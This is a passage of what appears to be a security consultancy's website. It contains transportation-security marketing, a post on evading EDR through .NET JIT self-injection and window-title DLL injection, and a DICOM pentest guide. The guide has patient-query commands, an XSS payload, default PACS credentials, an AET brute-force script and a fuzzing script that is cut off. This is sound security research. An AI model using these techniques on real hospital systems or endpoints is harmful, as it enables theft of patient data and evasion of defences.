As a pioneer in the field of automotive security, in 2015 IOActive was the first company to successfully launch a remote attack on a vehicle through its telematics unit (Security Experts Hack into Moving Car and Seize Control, Remote Exploitation of an Unaltered Passenger Vehicle).

For the past 5 years, IOActive has been focused on understanding Autonomous and Remote-Controlled/Access technologies and their inherent vulnerabilities and possible impacts to Functional Safety. IOActive consultants assume the posture of real-world attackers, attempting to bypass existing security controls and gain access to connected systems or services, or to the vehicle itself.

Transportation technology is evolving significantly, with enhanced autonomous functions revolutionizing automobiles, commercial trucks, agriculture equipment.  AI and Machine Learning (AI/ML) are fundamentally transforming Autonomous Vehicles by enabling them to understand road conditions, identify objects, predict traffic flow, make real-time decisions, and predict potential hazards, paving the way for partial and fully autonomous driving. IOActive delivers a suite of services that cover every facet of AI and ML security offerings which are built on proven methodologies (i.e. Threat Modeling/Architecture Review, AL/ML code review/Vulnerability Assessment, Application/Device Penetration Testing, and AI Infrastructure Security, for more information. https://www.ioactive.com/service/ai-security-services/).  As vehicles have become connected, this connectivity provides significant benefits and presents significant cybersecurity risks and vulnerabilities.

Two other emerging vehicle technologies that are now prevalent in today’s connected world are Telematics (i.e. automobiles, commercial trucks, agriculture/mining vehicles, and sea cranes) and Electric Vehicle Supply Equipment (EVSEs) and both have remote cloud infrastructures which increases the cybersecurity risks for attacks and vulnerabilities, such as: weak/unencrypted communications, over-the-air (OTA) firmware attacks, insecure APIs, and weak/vulnerable cloud services.

For over a decade, IOActive has been a pioneer in Transportation cybersecurity research, with a proven track record and experience in conducting penetration and security assessments on autonomous vehicles and remote-controlled assets, such as:

Automobiles – ADAS (Level 2 and 3), Robotaxis, TelematicsCommercial Trucks – Autonomous Trucks
Electric Vehicles – EVSEsAgriculture – Autonomous Agriculture Vehicles and Autonomous On-Road/Off-Highway Vehicles (OHV)
Autonomous shuttles – Personal Rapid Transit (PRT) vehiclesRail/Transit – Positive Train Control (PTC)
Aircraft – Drones and UAVsMining – Autonomous Haulage Systems (AHS) 
Locomotives – Remote-Controlled LocomotivesMaritime – Remote Operated Vessels (ROV) and Remote Operations Centers (ROCs)

A core focus of our transportation cybersecurity research program has been to help industry stakeholders with empirical vulnerability data to make risk-informed decisions about threats to cyber-physical systems. Table 1 summarizes our experience and provides examples of our recent Autonomous and Remote-Controlled/Remote Access projects conducted by IOActive over the past 5 years:

IOACTIVE TRANSPORTATION CYBERSECURITY RESEARCH

IOActive is the leading transportation cybersecurity firm, investing heavily in primary research and working with OEMs, suppliers, and academia to understand the risks, threats, and business impacts facing the transportation industry. IOActive leverages this body of research to provide clients with deeper assessments and superior guidance to leverage innovative new technologies while developing safer and more secure data, vehicles, and infrastructure. Table 2 depicts several sample research papers and articles published by IOActive regarding the Transportation Sectors and the links are below:

TRANSPORTATION CYBERSECURITY COMPLIANCE REGULATIONS/STANDARDS

Transportation cybersecurity compliance refers to the measures taken by transportation providers to ensure their systems and data are protected from cyber threats, while also adhering to regulatory and industry standards. This includes implementing security controls, reporting incidents, and conducting vulnerability assessment. Transportation organizations must comply with cybersecurity rules and regulations set by agencies like the TSA, DHS, UNECE, ISO/SAE, EU Commission, FAA, EASA, Coast Guard, International Association of Classification Societies (IACS) and IEC. The table below describes for each transportation sector the applicable Cybersecurity Standards, Risk Assessment Methodologies, Information Sharing and Analysis Center (ISACs), and Communications Protocols.

Table 3 describes for each transportation sector the applicable Cybersecurity Standards, Risk Assessment Methodologies, Information Sharing and Analysis Center (ISACs), and Communications Protocols.

IOACTIVE CYBERSECURITY SERVICES

To help protect your business from today’s increasingly complex and sophisticated cybersecurity risks, IOActive offers a full range of cybersecurity services, including penetration testing, full-scale assessments, secure development lifecycle support, red team and purple team engagements, AI/ML security services, supply chain integrity, code reviews, security training, and security advisory services. Learn more about our offerings at https://www.ioactive.com/services.

To learn more about IOActive’s Connected Vehicle Cybersecurity Services, click here.

At IOActive, we have penetration testing and full stack assessment skills that span all the transportation sectors and specifically, we have unique cybersecurity knowledge and capabilities regarding autonomous technologies. If you’re interested to learn more about how we can help, contact us and one of our transportation cybersecurity specialists will be in touch.

INSIGHTS | May 14, 2025

Breaking Patterns: Rethinking Assumptions in Code Execution and Injection

Breaking Patterns

Security solutions like Endpoint Detection and Response (EDRs) and behavioural detection engines rely heavily on identifying known patterns of suspicious activity. For example, API calls executed in a specific order, such as VirtualAllocEx, WriteProcessMemory, and CreateRemoteThread are often indicators suspicious behaviour.

In this post, we’ll explore two techniques that break traditional patterns:

  • Self-Injection – Overwriting a method in your own process memory from within a process running a .NET Framework-managed executable.
  • Indirect DLL Path Injection – Exploiting the Windows GUI system to implant payloads in another process without direct memory writes.

Self-Injection – Code Execution Without a Loader

Traditional shellcode loaders follow a well-trodden API sequence:

VirtualAlloc → Write shellcode → Change memory protection → Execute

In a .NET application, methods are not immediately compiled to native code. Instead, the JIT compiler translates Common Intermediate Language (CIL) into native machine code the first time a method is invoked. This native code is stored in memory regions allocated on the heap, which are already marked as executable (and often writable, as well). This characteristic makes the JIT-generated method bodies ideal targets for self-modifying behavior.

To determine the access permissions of the memory region holding the compiled code, we inspected the address where the function pointer of the JIT-compiled method points across various .NET runtime environments. Specifically, in .NET 8 (net8.0) and .NET 7 (net7.0), the memory was marked as read and execute (RX), reflecting modern security practices that avoid writable executable memory. However, in .NET 6 (net6.0), .NET 5 (net5.0), .NET Core 3.1 (netcoreapp3.1), and .NET Framework 4.8.1, the memory was marked as read, write, and execute (RWX), indicating a more permissive configuration. This comparison highlights a trend toward stricter memory protections in newer versions of .NET.

Runtime VersionMemory Access Permissions
.NET Framework 4.8.1RWX
.NET Core 3.1RWX
.NET 5RWX
.NET 6RWX
.NET 7RX
.NET 8RX

To exploit this, a method (such as a placeholder Test method) is compiled by the JIT, and its function pointer is retrieved via reflection. The shellcode is decrypted and copied directly over the compiled method using Marshal.Copy. When the method is called, the process executes the injected shellcode instead of the original .NET instructions.

The following screenshot shows an example of what this exploitation might look like in a program.

This program screenshot shows how an attacker would execute the shellcode when calling the Test() method. First, we force compilation of the Test() method. Then we retrieve the shellcode and use it to overwrite the compiled method. At the end, when Test() is called, the shellcode is executed instead of the Test method.

Note that in this example, there is no need to call VirtualAlloc or VirtualProtect, nor modify memory protection attributes. The memory containing JIT-compiled methods is already suitable for code execution, and writing into it directly bypasses many of the behavioral IOCs typically monitored by security tools.

This technique takes advantage of the .NET runtime’s own execution model, operating entirely within expected memory regions and avoiding any calls that would raise suspicion in traditional endpoint detection systems. While not impervious to all detection, it highlights how abusing trusted execution paths can erode the reliability of conventional heuristics.

Indirect DLL Path Injection

While this post will demonstrate the following technique using window renaming, the core idea is not tied to that mechanism—any method that causes a controllable string to be stored in another process’s memory can be leveraged similarly.

The Trouble with Traditional Process Injection

Process injection is a well-known tactic in the offensive security arsenal, often used by malware and red teamers alike to execute code in the context of another process. One of the most common forms is DLL injection using the following steps:

  1. Allocate memory in the remote process with VirtualAllocEx.
  2. Write the DLL path into the allocated memory with WriteProcessMemory.
  3. Call CreateRemoteThread to run LoadLibrary.

However, these steps produce well-known Indicators of Compromise (IOCs):

  • Use of VirtualAllocEx and WriteProcessMemory on a remote process
  • API call patterns: OpenProcess → VirtualAllocEx → WriteProcessMemory → CreateRemoteThread

Window Renaming as a Covert Channel

To avoid these behavioral signatures, we can use an alternative that removes the need for explicit memory allocation or memory writing in the remote process.

The Core Idea

Instead of using VirtualAllocEx and WriteProcessMemory, we leverage existing window handles owned by the target process.

Step-by-Step Logic

  1. Enumerate Windows: Use EnumWindows to find window handles belonging to the target process.
  2. Rename a Window: Modify the window’s title. The new title will be our DLL path.
  3. Memory Side Effect: When the title is set, Windows internally stores this string in the process’s address space—effectively writing our DLL path without WriteProcessMemory.
  4. Scan Process Memory: Read the remote process memory to find our DLL path string using ReadProcessMemory. The title of the window should be easy to identify but this will not be the case if a different indirect method is used.
  5. Invoke LoadLibrary: Use CreateRemoteThread to execute LoadLibraryA with the found address.

Benefits of the indirect injection technique:

  • No VirtualAllocEx – we’re not allocating memory in the remote process.
  • No WriteProcessMemory- we’re not directly writing to remote memory.
  • No unusual memory protection flags or RWX pages.
  • The only “invasive” step is CreateRemoteThread, but even that can be replaced with more stealthy execution methods (e.g., APC, thread execution hijacking, etc.).
  • The window renaming APIs (SetWindowText, SetClassLongPtr) are rarely monitored by EDRs.
  • Looks more like GUI interaction than code injection.

Conclusion

This injection method sidesteps common behavioral IOCs by co-opting the windowing system as a covert memory channel. While not bulletproof, it challenges the assumptions many EDRs rely on and demonstrates how creative thinking can yield new evasion paths.

INSIGHTS | April 30, 2025

Penetration Testing of the DICOM Protocol: Real-World Attacks

Exploring the DICOM protocol from both a technical and offensive perspective, detailing various attack vectors and their potential impact.

Introduction to the DICOM Protocol

The Digital Imaging and Communications in Medicine (DICOM) protocol is the de-facto standard for the exchange, storage, retrieval, and transmission of medical imaging information. It is widely adopted across healthcare systems for integrating medical imaging devices, such as scanners, servers, workstations, and printers, from multiple manufacturers. DICOM supports interoperability through a comprehensive set of rules and services, including data formatting, message exchange, and workflow management.

DICOM was first developed by the American College of Radiology (ACR) and the National Electrical Manufacturers Association (NEMA), and is now maintained and published by the Medical Imaging & Technology Alliance (MITA) as part of the NEMA standards suite. The protocol is formally specified in the DICOM Standard[1], which defines the data model, communication services, and conformance mechanisms that vendors and implementers must follow. An overview of DICOM’s key principles is also described in RFC 3240[2], which outlines how the protocol enables device interoperability and structured data exchange in medical environments.

DICOM handles tasks such as:

  • Transmitting medical images and associated metadata between imaging modalities and archives
  • Managing imaging workflows and procedure steps
  • Ensuring compatibility between different manufacturers’ systems through standardized message formats and service classes

Typically, DICOM servers—often referred to as Picture Archiving and Communication Systems (PACS)—listen on a designated port (default: 104) and operate using a client-server model, where entities negotiate roles as Service Class Providers (SCPs) or Service Class Users (SCUs). By default, DICOM data is transmitted in plaintext, without encryption, which poses significant security concerns in real-world deployments. As noted in the DICOM Standard PS3.15 on Security and System Management Profiles[3], secure communication can be achieved using Transport Layer Security (TLS), with port 2762 typically used for encrypted connections.

However, the adoption of DICOM over TLS remains inconsistent. When improperly configured, DICOM communications may expose Protected Health Information (PHI) to interception or tampering. This makes DICOM networks a compelling target for attackers, especially in environments lacking proper segmentation or monitoring.

Each DICOM endpoint is identified by an Application Entity Title (AET), a case-sensitive identifier that specifies the source or destination of a message. While AETs contribute to access control logic by matching incoming requests against a list of known entities, they do not constitute a strong authentication method. Since they are often guessable or misconfigured, attackers can exploit them to impersonate trusted devices.

DICOM’s complexity and extensibility, while essential for medical use cases, can introduce security challenges if administrators are unaware of the protocol’s design and capabilities. Insecure deployments—such as open DICOM ports, absent TLS, or unrestricted AETs—can lead to unauthorized image retrieval, metadata exfiltration, or system compromise. In this post, we’ll explore how these vulnerabilities arise and how they can be exploited in penetration testing scenarios.

Threat and Impact

DICOM data includes patient details such as name, ID, date of birth, medical description, modality, images, procedure times, accession number, referring physician, and institution. The snippet below demonstrates the information found in a DCM file (DCM being the typical DICOM file extension).

└─$ dcmdump 0015.DCM --search PatientName --search PatientID --search Modality --search PatientSex --search ReferringPhysicianName --search PerformingPhysicianName
(0010,0010) PN [Rubo DEMO]                              #  10, 1 PatientName
(0010,0020) LO [10-55-87]                               #   8, 1 PatientID
(0008,0060) CS [RF]                                     #   2, 1 Modality
(0010,0040) CS [F]                                      #   2, 1 PatientSex
(0008,0090) PN [Dr.Simon]                               #   8, 1 ReferringPhysicianName
(0008,1050) PN [Dr.Sick]                                #   8, 1 PerformingPhysicianName

Exposing patient data poses serious risks:

  • Privacy Breach: Sensitive medical information leakage violates privacy rights and erodes trust.
  • Identity Theft: Fraudsters can misuse personal data for health insurance scams or financial fraud, compromising medical records and care.
  • Healthcare Fraud: Fake prescriptions and fraudulent claims burden healthcare systems.
  • Social Engineering: Leaked data facilitates scams that manipulate victims into disclosing more information or money.
  • Legal Consequences: Institutions face fines and lawsuits for failing to protect patient data.
  • False Procedures: Data misuse can cause record errors and harmful treatments.
  • Medical Extortion: Sensitive data can be exploited for financial or emotional blackmail.

Safeguarding patient data is critical to ensure privacy, trust, and safety.


Communicating with DICOM Servers Using DCMTK

Before diving into the attack vectors, it’s important to understand how to communicate with DICOM servers for both legitimate and security testing use cases. For demonstration purposes, a test instance of the DCM4CHEE DICOM server was set up. Installation instructions can be found at https://dcm4che.atlassian.net/wiki/spaces/ee2/pages/2555918/Installation?focusedCommentId=229769217.

A sample of the web interface is shown below:

One of the most common toolkits for interacting with DICOM services is DCMTK[4]. Below are a few useful utilities from DCMTK.

echoscu

echoscu sends a DICOM C-ECHO request (similar to a “ping” in networking). It verifies connectivity and basic compatibility.

# Example usage of echoscu
$ echoscu -aet MYAET -aec SERVERAET 192.168.1.10 104
  • -aet MYAET: Sets your local Application Entity Title.
  • -aec SERVERAET: The remote server’s AET.
  • 192.168.1.10 104: The DICOM server’s IP and port.

A sample successful response is shown below:

└─$ echoscu -aet IOA -aec DCM4CHEE 172.24.0.1 11112 -v
I: Requesting Association
I: Association Accepted (Max Send PDV: 16340)
I: Sending Echo Request (MsgID 1)
I: Received Echo Response (Success)
I: Releasing Association

findscu

findscu performs a C-FIND operation, querying the remote DICOM server for matching studies, series, or images based on query parameters.

# Example usage of findscu
$ findscu -v -aet CLIENT_AET -aec SERVERAET 192.168.1.10 104 -k 0008,0052="PATIENT" -k 0010,0010 -k 0010,0020 -S

  • -S: Indicates a study-level query.
  • -k: Provides the key (or attribute) to search, e.g., PATIENT.
  • -aet: set my calling AE title (default: FINDSCU)
  • -aec: set called AE title of peer (default: ANY-SCP)

As a result, all patient IDs and names are returned.

└─$ findscu -v -aet IOA -aec DCM4CHEE 172.24.0.1 11112 -k 0008,0052="PATIENT" -k 0010,0010 -k 0010,0020 -S
I: Requesting Association
I: Association Accepted (Max Send PDV: 16340)
I: Sending Find Request (MsgID 1)
I: Request Identifiers:
I:
I: # Dicom-Data-Set
I: # Used TransferSyntax: Little Endian Explicit
I: (0008,0052) CS [PATIENT]                                #   8, 1 QueryRetrieveLevel
I: (0010,0010) PN (no value available)                     #   0, 0 PatientName
I: (0010,0020) LO (no value available)                     #   0, 0 PatientID
I:
I: ---------------------------
I: Find Response: 1 (Pending)
I:
I: # Dicom-Data-Set
I: # Used TransferSyntax: Little Endian Implicit
I: (0008,0000) UL 34                                       #   4, 1 GenericGroupLength
I: (0008,0005) CS [ISO_IR 100]                             #  10, 1 SpecificCharacterSet
I: (0008,0052) CS [PATIENT ]                               #   8, 1 QueryRetrieveLevel
I: (0010,0000) UL 42                                       #   4, 1 GenericGroupLength
I: (0010,0010) PN [Jones^James ]                           #  12, 1 PatientName
I: (0010,0020) LO [Patient ID_001]                         #  14, 1 PatientID
I:
I: ---------------------------
I: Find Response: 2 (Pending)
I:
I: # Dicom-Data-Set
I: # Used TransferSyntax: Little Endian Implicit
I: (0008,0000) UL 34                                       #   4, 1 GenericGroupLength
I: (0008,0005) CS [ISO_IR 100]                             #  10, 1 SpecificCharacterSet
I: (0008,0052) CS [PATIENT ]                               #   8, 1 QueryRetrieveLevel
I: (0010,0000) UL 34                                       #   4, 1 GenericGroupLength
I: (0010,0010) PN [Rubo DEMO ]                             #  10, 1 PatientName
I: (0010,0020) LO [10-55-87]                               #   8, 1 PatientID
I:
I: Received Final Find Response (Success)
I: Releasing Association

dcmsend

dcmsend transmits local DICOM files to a remote DICOM server (C-STORE operation).

# Sending a single DICOM file to the server
$ dcmsend -v -aet MYAET -aec SERVERAET 172.24.0.1 11112 /path/to/dicom/file.dcm
# Sending multiple DICOM files to the server
$ dcmsend -v -aet MYAET -aec DCM4CHEE 172.24.0.1 11112 --scan-directories /path/to/dicom/

A successful message is shown below:

└─$ dcmsend -v -aec DCM4CHEE -to 60 172.24.0.1 11112 0015.DCM
I: checking input files ...
I: starting association #1
I: initializing network ...
I: negotiating network association ...
I: Requesting Association
I: Association Accepted (Max Send PDV: 16340)
I: sending SOP instances ...
I: Converting transfer syntax: Little Endian Explicit -> Little Endian Implicit
I: Sending C-STORE Request (MsgID 1, RF)
I: Received C-STORE Response (Success)
I: Releasing Association
I:
I: Status Summary
I: --------------
I: Number of associations   : 1
I: Number of pres. contexts : 1
I: Number of SOP instances  : 1
I: - sent to the peer       : 1
I:   * with status SUCCESS  : 1

dcdump

dcdump displays the contents of a DICOM file. This is helpful for understanding the fields and tags inside a DICOM object.

# Viewing the inside of a DICOM file
$ dcdump /path/to/dicom/file.dcm

Sample output:

dcmodify

dcmodify edits the content of DICOM files by changing, adding, or removing specific tags.

# Modifying the PatientName field
$ dcmodify -i "PatientName=TEST^PATIENT" /path/to/dicom/file.dcm

  • -i or --insert "[t]ag-path=[v]alue": insert (or overwrite) path at position t with value v
  • -m or --modify "[t]ag-path=[v]alue": modify tag at position t to value v
  • -e or --erase "[t]ag-path": erase tag/item at position t

Attack Scenarios

In the following sections, we’ll demonstrate various attacks and testing strategies against DICOM servers. They exploit issues we commonly encounter during our penetration tests and underscore the importance of proper security configurations.

1. Identifying Insecure Configurations

Often, administrators leave default configurations in place or set up DICOM services without robust access control. Attackers can leverage these misconfigurations to perform unauthorized operations, such as querying patient records or storing malicious DICOM objects.

Testing Approach:

1. Use findscu to query the DICOM server with various known or guessed AETs. The script provided here can be used to automatically go through a list of known AETs. The list below shows some commonly used AETs. These AET titles can vary depending on the vendor, installation, or configuration of the DICOM system. They are usually customizable during setup.

- PACS
  - Picture Archiving and Communication System
- ORTHANC
  - Open-source DICOM server
- DCM4CHEE
  - DICOM software suite for clinical workflows
- MEDPACS
  - Used in various PACS implementations
- IMAGESERVER
  - General purpose server title
- RADWORKS
  - Associated with radiology workflows
- CTSERVER
  - CT scanner DICOM server
- MRI_SERVER
  - MRI-specific DICOM server
- STORE_SCP
  - Storage Service Class Provider
- DICOMNODE
  - General use in testing or small-scale servers
  • Inspect the results for any sensitive data returned.
  • Attempt to store DICOM objects using the identified AET.

2. Look for exposed web interfaces on the network. In our example the DCM4CHEE web interface is hosted over plaintext HTTP on localhost port 8080 but the HTTPs service is available to the local network.

Pro Tip: Check for default credentials. A sample list is shown below.

DICOM Server / PACSDefault UsernameDefault PasswordReference
OrthancorthancorthancQuickstart guide for Windows
Dcm4CheeadminadminDCM4CHEE 2.17.1 Installation Instructions
PACSOne Serverroot<empty>PacsOne Server Installation Guide
OnePacs GatewayadminonepacsadminOnePacs Gateway User Interface
SonicDICOM PACSadminpasswordSonicDICOM PACS Login Guide
Medweb Secure DICOM ProxyAdminAdminMedweb Secure DICOM Proxy WebserverProxy Webserver Proxy WebserverProxy Webserver
CharruaPACSadminadminCharruaPACS User Manual

2. Checking for Unencrypted Services

DICOM traffic is often sent unencrypted over TCP port 104, exposing sensitive patient data in transit. Attackers can sniff or intercept this traffic to gather PHI.

Testing Approach:

  • Use a packet sniffer (e.g. Wireshark) on the network where the DICOM server is deployed.
  • Look for unencrypted data such as patient names, study descriptions, etc.

  • Validate if the server supports TLS and if it’s configured properly.

Pro Tip: DICOM over TLS is possible but requires additional configuration. Check if any secure port (often 2762 or a custom port) is enabled.

3. Exploiting Unprotected Services

Some DICOM services may be left exposed without authentication. This can allow remote attackers to:

1. Upload malicious DICOM files (which could contain embedded scripts or executables)

Using dcmodify it is possible to include malicious payloads, such as the XSS payload below, in the various attributes of the DCM file. The dcmsend tool can then be used to store the object to the server.

└─$ dcmodify -m "PatientName=<script>alert();</script>" 0002.DCM

└─$ dcmsend -v -aec DCM4CHEE 172.24.0.1 11112 0002.DCM
I: checking input files ...
I: starting association #1
I: initializing network ...
I: negotiating network association ...
I: Requesting Association
I: Association Accepted (Max Send PDV: 16340)
I: sending SOP instances ...
I: Sending C-STORE Request (MsgID 1, XA)
I: Received C-STORE Response (Success)
I: Releasing Association
I:
I: Status Summary
I: --------------
I: Number of associations   : 1
I: Number of pres. contexts : 1
I: Number of SOP instances  : 1
I: - sent to the peer       : 1
I:   * with status SUCCESS  : 1

The payload will then be consumed by the server and potentially be shown to an authenticated user. Depending on the input validation and output encoding in place, it can introduce vulnerabilities to other systems. In the DCM4CHEE case, the XSS payload was properly encoded before being returned to the user’s browser, preventing execution of the script.

2. Query or retrieve existing images without authorization.
In the following example the DVTk RIS Simulator was used in its default configuration. It was observed that despite the local and remote AET being set, data could still be retrieved without providing any AET.

Taking a closer look at the logs, it appears that a couple of errors were generated during the connection; however, it did not prevent data from being returned. This could be due to the default configuration of this emulator, but there was no obvious way to change this behavior through the settings. This is shown as an example of a server that is misconfigured and does not validate the AET properly.

Testing Approach:

  • Use dcmsend to attempt to store a manipulated DICOM file to the server.
  • Use findscu and getscu to retrieve images.
  • Check logs and responses to confirm unauthorized or unauthenticated operations are possible.

4. Brute-Forcing AETs

DICOM servers rely on matching AETs to accept requests. These AETs may not be well-guarded or could be guessable. A brute-force attack aims to discover valid AETs that the server recognizes.

Using findscu for AET Verification

You can systematically try a list of potential AETs using findscu. The bash script below automates the process.

#!/usr/bin/env bash
#
# Usage: ./dicom_aet_bruteforce.sh <host> <port> <aet_file>
#
# Description:
#   Attempts to find a valid Called AE Title on a DICOM server by iterating
#   over a list of candidate AETs and using the 'findscu' command from DCMTK.
#
#   Exit codes from findscu are interpreted as:
#       0 = Success (found a valid AE Title, stop the script)
#       2 = Unrecognized AE Title (continue to next candidate)
#       otherwise = Other error (continue to next candidate)
#
# Requirements:
#   - DCMTK installed (to have the 'findscu' utility).
#   - Bash v4+ (for better script portability).
#

# --- 1) Check script arguments -----------------------------------------------
if [ $# -ne 3 ]; then
  echo "Usage: $0 <host> <port> <aet_file>"
  exit 1
fi

HOST="$1"
PORT="$2"
AET_FILE="$3"

# --- 2) Ensure findscu is installed ------------------------------------------
if ! command -v findscu >/dev/null 2>&1; then
  echo "[ERROR] 'findscu' not found. Please install DCMTK or verify your PATH."
  exit 1
fi

# --- 3) Validate the AET file -----------------------------------------------
if [ ! -f "$AET_FILE" ]; then
  echo "[ERROR] AET file '$AET_FILE' not found or is not a regular file."
  exit 1
fi

# --- 4) Brute-force loop over AET candidates ---------------------------------
while IFS= read -r AET; do

  # Skip empty lines
  [ -z "$AET" ] && continue

  echo "[INFO] Trying AET: '$AET'"

  # Run findscu with the desired parameters
  # -aet IOA  (Our local AE Title)
  # -aec "$AET" (Called AE Title)
  # -k 0008,0052="PATIENT"  (Query/Retrieve level = PATIENT)
  # -k 0010,0010 (Return Patient Name)
  # -k 0010,0020 (Return Patient ID)
  # -S (scan/print results in a more structured way)
  findscu -v \
    -aet IOA \
    -aec "$AET" \
    "$HOST" "$PORT" \
    -k 0008,0052="PATIENT" \
    -k 0010,0010 \
    -k 0010,0020 \
    -S >/dev/null 2>&1

  EXIT_CODE=$?

  # --- 5) Check the exit code ------------------------------------------------
  case $EXIT_CODE in
    0)
      # 0 means success
      echo "[SUCCESS] Found a valid Called AE Title: '$AET'"
      exit 0
      ;;
    2)
      # 2 typically means "Called AE Title Not Recognized"
      echo "[FAILED] AE Title not recognized: '$AET'"
      # Continue trying next AE Title
      ;;
    *)
      # Other exit codes - treat as unexpected error but keep going
      echo "[ERROR] findscu returned exit code: $EXIT_CODE"
      echo "[INFO] Continuing with next AET..."
      ;;
  esac

done < "$AET_FILE"

# If we reach here, no AE Title responded successfully
echo "[INFO] Brute-forcing completed. No valid AE Title found."
exit 1

Sample output:

└─$ ./dicom-brute-aet.sh 172.24.0.1 11112 aets.txt
[INFO] Trying AET: 'WRONGAET'
[FAILED] AE Title not recognized: 'WRONGAET'
[INFO] Trying AET: 'BADAET'
[FAILED] AE Title not recognized: 'BADAET'
[INFO] Trying AET: 'DCM4CHEE'
[SUCCESS] Found a valid Called AE Title: 'DCM4CHEE'

5. Fuzzing the Protocol

What is Fuzzing?

Fuzzing is an automated testing methodology where invalid, unexpected, or random inputs (payloads) are injected into a program to observe its behavior. Payloads can be:

  • Mutation-Based: Derived from existing valid inputs by altering values, formats, or structures
  • Generation-Based: Created from scratch based on a model or protocol specification

Fuzzing is typically categorized into:

  • Black-Box Fuzzing:
    In this scenario, the source code of the target application is unavailable. The fuzzer interacts only with the executable, observing output or crashes to infer vulnerabilities.
  • Grey-Box Fuzzing:
    When source code is available, the binary can be instrumented. This allows the fuzzer to monitor execution paths, functions, and memory usage. The feedback enables the fuzzer to steer test case generation, focusing on areas that exhibit unusual behavior or crashes.

By leveraging fuzzing, testers can identify memory corruption, unhandled exceptions, and other vulnerabilities that might compromise system security.

Fuzzing the DICOM protocol involves injecting malformed or unexpected data into the server to trigger crashes, hangs, or other unintended behaviors. Two tools we commonly use are Radamsa[5] and AFLNet[6].


Radamsa Fuzzing Example (Black-Box Fuzzing)

Radamsa is a simple yet powerful fuzzer that mutates existing test files and passes the mutations to the target. Below is a step-by-step manual approach to fuzz the PatientName attribute in a DICOM file:

1. Extract a sample DICOM file:

$ dcmdump /path/to/dicom/file.dcm > original_dump.txt

2. Identify the PatientName line:

$ dcmdump /path/to/dicom/file.dcm --search PatientName

3. Use radamsa to generate mutated strings for the PatientName:

$ echo "DOE^JOHN" | radamsa > mutated_name.txt

4. Use dcmodify to insert the mutated name into the original DICOM file:

$ dcmodify -m "PatientName=$(cat mutated_name.txt)" /path/to/dicom/file.dcm

5. Send the modified DICOM file to the server:

$ dcmsend -aet MYAET -call SERVERAET 192.168.1.10 104 /path/to/dicom/file.dcm

Below is an example Python script to automate this process. The script processes a DICOM file, extracts specific attributes, and allows the user to select which attributes to fuzz. For each selected attribute, the script generates a payload using Radamsa, modifies the DICOM file with the payload, and sends the modified file to the specified DICOM server using dcmsend. After sending each payload, the echoscu command is used to check if the server is still responding, so a potential DoS can be detected.

To run the script, use the following command:

$ python dicom_fuzzing_tool.py --dcm <path_to_dicom_file> --payloads <number_of_payloads> --aet <calling_AET> --ip <server_IP> --port <server_port> [-d]

Replace the placeholders with appropriate values:

  • <path_to_dicom_file>: Path to the DICOM file to be processed
  • <number_of_payloads>: Number of payloads to create for each target attribute
  • <calling_AET>: AET for the client
  • <server_IP>: IP address of the DICOM server
  • <server_port>: Port number of the DICOM server
  • -d: Enables debug mode for verbose output (optional)

import argparse
import os
import subprocess
import tempfile
import shutil

def run_command(command, debug):
    if debug:
        print(f"[DEBUG] Running command: {command}")
    try:
        result = subprocess.run(command, shell=True, check=True, text=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        if debug:
            print(f"[DEBUG] Command output: {result.stdout}")
        return result.stdout
    except subprocess.CalledProcessError as e:
        print(f"[!] Command failed: {command}")
        print(f"[!] Error: {e.stderr}")
        exit(1)

def run_command_raw(command, debug):
    if debug:
        print(f"[DEBUG] Running command: {command}")
    try:
        result = subprocess.run(command, shell=True, check=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        if debug:
            print(f"[DEBUG] Raw Command output: {result.stdout[:50]}... (truncated for debug)")
        return result.stdout
    except subprocess.CalledProcessError as e:
        print(f"[!] Command failed: {command}")
        print(f"[!] Error: {e.stderr}")
        exit(1)

def parse_dcmdump(dump_output):
    valid_attributes = {
        "StudyDate",
        "StudyTime",
        "Manufacturer",
        "InstitutionName",
        "InstitutionAddress",
        "ReferringPhysicianName",
        "StudyDescription",
        "PerformingPhysicianName",
        "PatientName",
        "PatientID",
        "PatientBirthDate",
        "PatientSex",
        "StudyID",
        "SeriesNumber",
        "InstanceNumber",
        "PatientOrientation",
    }

    attributes = {}
    try:
        for line in dump_output.splitlines():
            if line.startswith("(") and "#" in line:  # Ensure the line has a tag and description
                parts = line.split("#", 1)  # Split at the `#`
                tag_and_value = parts[0].strip()  # Left part: tag and value
                description = parts[1].strip()  # Right part: attribute name and value

                # Extract the tag and the value
                if "(" in tag_and_value and ")" in tag_and_value:
                    tag, raw_value = tag_and_value.split(")", 1)
                    tag = tag.strip() + ")"
                    value = raw_value.strip()
                    if "[" in value and "]" in value:  # Extract value from square brackets
                        value = value[value.index("[") + 1 : value.index("]")]
                    else:
                        value = "(no value available)"

                    # Extract the attribute name
                    name = description.split()[-1]  # The last word in the description
                    if name in valid_attributes:
                        attributes[name] = (tag, value)
    except Exception as e:
        print(f"[!] Error while parsing dcmdump output: {e}")
        exit(1)

    return attributes

def generate_payload(original_value, debug):
    print("[*] Generating a payload with radamsa...")
    try:
        command = f"echo {original_value} | radamsa"
        result = run_command_raw(command, debug)
        return result.strip()
    except Exception as e:
        print(f"[!] Error generating payload: {e}")
        exit(1)

def check_server_responsiveness(server_ip, server_port, aet, debug):
    try:
        command = f"echoscu -v {server_ip} {server_port} -aec {aet} -to 1"
        if debug:
            print(f"[DEBUG] Checking server responsiveness with: {command}")
        result = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)
        if debug:
            print(f"[DEBUG] echoscu output: {result.stdout}")
        
        # Check for success
        if result.returncode == 0:
            return True

        # Handle specific errors
        if "Peer aborted Association" in result.stderr or "Association Request Failed" in result.stderr:
            if debug:
                print(f"[DEBUG] Association error detected: {result.stderr}")
            return False  # Server is unresponsive, treat as a potential DoS

        # Treat other errors as unexpected
        print(f"[!] Unexpected error while checking server responsiveness: {result.stderr}")
        return False

    except Exception as e:
        print(f"[!] Error checking server responsiveness: {e}")
        exit(1)

def escape_payload(payload):
    if isinstance(payload, bytes):
        payload = payload.decode(errors="replace")
    # Replace null bytes and escape special characters
    payload = payload.replace("\x00", "\\x00")  # Encode null bytes
    # Escape problematic shell characters
    payload = payload.replace("\\", "\\\\")  # Escape backslashes first
    payload = payload.replace("`", "\\`").replace("\"", "\\\"").replace("$", "\\$").replace("'", "'\"'\"'").replace("(", "\\(").replace(")", "\\)")
    return payload

def modify_and_send(dcm_file, tag, original_value, num_payloads, aet, server_ip, server_port, debug):
    try:
        # Create a temporary copy of the original DICOM file
        temp_dcm_file = tempfile.NamedTemporaryFile(delete=False, suffix=".dcm").name
